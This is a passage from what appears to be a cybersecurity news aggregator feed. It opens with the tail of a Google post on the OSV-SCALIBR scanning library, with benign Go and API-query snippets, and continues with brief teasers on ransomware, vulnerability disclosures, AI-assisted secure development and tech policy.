...)...filesys, _ := image.NewFromRemoteName( ""alpine:latest"", remote.WithAuthFromKeychain(authn.DefaultKeychain),)cfg := &scalibr.ScanConfig{ ScanRoots: []*fs.ScanRoot{{FS: filesys}}, ...}4. Find vulnerabilities on your filesystem or a remote container:Extract the PURLs from the SCALIBR inventory results from the previous steps:import ( ... ""github.com/google/osv-scalibr/converter"" ...)...result := scalibr.New().Scan(ctx, cfg)for _, i := range result.Inventories { fmt.Println(converter.ToPURL(i))}And send them to osv.dev, e.g.$ curl -d ''{""package"": {""purl"": ""pkg:npm/dojo@1.2.3""}}'' ""https://api.osv.dev/v1/query""See the usage docs for more details.OSV-Scanner + OSV-SCALIBRUsers looking for an out-of-the-box vulnerability scanning CLI tool should check out OSV-Scanner, which already provides comprehensive language package scanning capabilities using much of the same extraction as OSV-SCALIBR. Some of OSV-SCALIBR’s capabilities are not yet available in OSV-Scanner, but we’re currently working on integrating OSV-SCALIBR more deeply into OSV-Scanner. This will make more and more of OSV-SCALIBR’s capabilities available in OSV-Scanner in the next few months, including installed package extraction, weak credentials scanning, SBOM generation, and more.Look out soon for an announcement of OSV-Scanner V2 with many of these new features available. OSV-Scanner will become the primary frontend to the OSV-SCALIBR library for users who require a CLI interface. Existing users of OSV-Scanner can continue to use the tool the same way, with backwards compatibility maintained for all existing use cases. For installation and usage instructions, have a look at OSV-Scanner’s documentation here.What’s nextIn addition to making all of OSV-SCALIBR’s features available in OSV-Scanner, we''re also working on additional new capabilities. Here''s some of the things you can expect:Support for more OS and language ecosystems, both for regular extraction and for Guided RemediationLayer attribution and base image identification for container scanningReachability analysis to reduce false positive vulnerability matchesMore vulnerability and misconfiguration detectors for WindowsMore weak credentials detectorsWe hope that this library helps developers and organizations to secure their software and encourages the open source community to contribute back by sharing new plugins on top of OSV-SCALIBR.If you have any questions or if you would like to contribute, don''t hesitate to reach out to us at osv-discuss@google.com or by posting an issue in our issue tracker.
by Google Security Blog
2025-01-16 14:01:17
Clop ransomware gang names dozens of victims hit by Cleo mass-hack, but several firms dispute breachesThe Russia-linked ransomware group is threatening to leak data stolen from almost 60 Cleo Software customers if ransoms aren''t paid © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-16 14:00:10
More From Our Main Blog: New Possibilities with Purple AI | Third-Party Log Sources & Multilingual Question SupportLearn about the all-new third-party log sources and multilingual question support features just released for SentinelOne''s Purple AI. The post New Possibilities with Purple AI | Third-Party Log Sources & Multilingual Question Support appeared first on SentinelOne.
by SentinelOne
2025-01-16 14:00:00
The current state of ransomware: Weaponizing disclosure rules and moreAs we near the end of 2024, ransomware remains a dominant and evolving threat against any organization. Cyber criminals are more sophisticated and creative than ever. They integrate new technologies, leverage geopolitical tensions and even use legal regulations to their advantage. What once seemed like a disruptive but relatively straightforward crime has evolved into a […] The post The current state of ransomware: Weaponizing disclosure rules and more appeared first on Security Intelligence.
by Security Intelligence
2025-01-16 13:30:27
Resurrecting Shift-Left With Human-in-the-loop AIResurrecting Shift-Left With Human-in-the-loop AI Alex Rice Thu, 01/16/2025 - 10:28 Body What’s Needed for Secure by Design SuccessWe spent years understanding the culprits of why “shift-left” controls fail to identify the principles needed for them to succeed. Success starts with a developer-first foundation and a discipline to eliminate work vs. create it.The Developer-first Application Security FoundationTo guide developers to write secure code, they need to be armed with actionable information. In fact, use “actionable” interchangeably with “useful.”The key ingredients for actionability are context, speed, and low-noise output. It needs to be focused, fast, and understand what’s being analyzed. Static Application Security Testing (SAST) and Software Composition Analysis (SCA) tools are fast but fall short on context and noise. The problem is how often they’re not right—bombarding developers with false positives and duplicate warnings.The source of information needs to continuously learn. A process is doomed for failure if developers need to constantly explain their work and escalate exceptions. Developer security tools need to listen, watch, and adapt without intervention. If application security listens to developers and provides value, developers respond by listening and learning back.When application security activates in development, it should be non-blocking. Blocking mechanisms bring development—and everything else—to a halt. They incentivize creative bypasses, not secure code. Applying preventative safeguards is important, but overburdening developers because they work on the pre-production side of the SDLC is hardly a balanced defense-in-depth strategy.Finally, security can’t just make noise at developers. Remediation needs to be part of the solution. To address issues that arise, there needs to be interactive support throughout the lifecycle.Where “Shift Left” Went WrongEfforts to introduce security testing earlier in the SDLC usually begin with applying SAST (and IAST, DAST, SCA, RASP, etc.) scanners. These are fast and, because of broad compatibility with most programming languages, theoretically scalable. The problem is the work it takes to prove their output is right or wrong, leading to compounding backlogs. And upon examination, they’re often wrong, leading to security policies developers don’t trust. It’s here where application security in development stalls: trying to make a dysfunctional policy work (as security debt grows).None of this is to say security code scanners aren’t powerful and valuable. Their maintainers, whose work has done the world a great service, never claimed for them to stand as a single strategy. “Shift left” failed developers as a well-intended, unspoken hope that there’d be an easy fix to a hard problem.The Future of Developer Security with AIScanners are limited when it comes to things like understanding massive legacy codebases, identifying misuse of functionality in microservice architectures, and finding flaws related to code not written. Here, AI shines and the future looks bright. Models, trained on corpuses of training data, are capable of analyzing entire codebases. Secure code systems can flag areas that deviate from normal patterns. Great news for developers and security engineers who have carried 100% of the manual secure code review burden for years.Is AI alone the solution to right what “shift left” got wrong?Embarking on these opportunities made possible with AI, it’s important to remember technology is a tool, not a replacement for invaluable human expertise.Human-AI CollaborationRethinking “shift-left” security strategy by incorporating AI technology is exciting, but warrants safe and responsible exploration. Execution of deployment requires human-in-the-loop (HITL) oversight as a governing principal. Conventionally, objectives of a HITL methodology are to improve the models they oversee—ensuring AI systems are accurate, robust, ethical, adaptable, and align with real-world goals.Let’s challenge conventional thinking.Instead of prioritizing the efficacy of AI systems, what if human-in-the-loop oversight priorities begin and end with helping a developer write secure code? What if human experts can not only categorize model output as “right” or ""wrong,” but expand on what’s “right” so it’s actionable with all of the context details taken into account? What if they’re a teammate who can help a developer on a problem-solving journey of taking action to remediate?Let’s Resurrect Shift-Left SecurityCheck out the on-demand webinar during which we discuss how a human-AI collaborative approach transforms security from a dreaded blocker into a powerful enabler of development velocity.Broken Security Promises: How Human-AI Collaboration Rebuilds Developer TrustOriginally aired on Jan. 16, 2025 @ 12pm ETStay tuned for more insights into how HackerOne is working with dev teams to reinvent secure development together. Excerpt Let''s explore how human-in-the-loop AI can help implement successful secure-by-design. Main Image
by HackerOne
2025-01-16 12:54:14
New gadgets unveiled at CES 2025, and their impact on security | Kaspersky official blogCybersecurity trends at the Consumer Electronics Show: from AI glasses to biometric locks.
by Kaspersky
2025-01-16 12:15:00
Python-Based Malware Powers RansomHub Ransomware to Exploit Network FlawsCybersecurity researchers have detailed an attack that involved a threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints and then leveraged this access to deploy the RansomHub ransomware throughout the target network. According to GuidePoint Security, initial access is said to have been facilitated by means of a JavaScript malware downloaded named
by The Hacker News
2025-01-16 12:09:00
Researcher Uncovers Critical Flaws in Multiple Versions of Ivanti Endpoint ManagerIvanti has rolled out security updates to address several security flaws impacting Avalanche, Application Control Engine, and Endpoint Manager (EPM), including four critical bugs that could lead to information disclosure. All the four critical security flaws, rated 9.8 out of 10.0 on the CVSS scale, are rooted in EPM, and concern instances of absolute path traversal that allow a remote
by The Hacker News
2025-01-16 11:30:00
7 reasons to shorten SSL certificate validity periodsShorter SSL certificate validity periods enhance digital security by reducing risks like private key compromise, misissuance, and revocation delays. They align certificate ownership with domain control, encourage crypto agility, and address limitations of current revocation methods. Short validity periods also promote automation, streamline renewal processes, and future-proof systems against evolving cybersecurity challenges. While increased renewal frequency poses challenges, adopting automated solutions can mitigate risks and ensure seamless management.
by Sectigo
2025-01-16 11:30:00
Biden's Cyber Ambassador Urges Trump Not to Cede Ground to Russia and China in Global Tech FightNathaniel Fick, the ambassador for cyberspace and digital policy, has led US tech diplomacy amid a rising tide of pressure from authoritarian regimes. Will the Trump administration undo that work?
by WIRED Security News
2025-01-16 11:02:58
GitHub’s Deepfake Porn Crackdown Still Isn’t WorkingOver a dozen programs used by creators of nonconsensual explicit images have evaded detection on the developer platform, WIRED has found.
by WIRED Security News
2025-01-16 11:00:00
Trusted Apps Sneak a Bug Into the UEFI Boot ProcessSeven system recovery programs contained what amounted to a backdoor for injecting any untrusted file into the system startup process.
by Dark Reading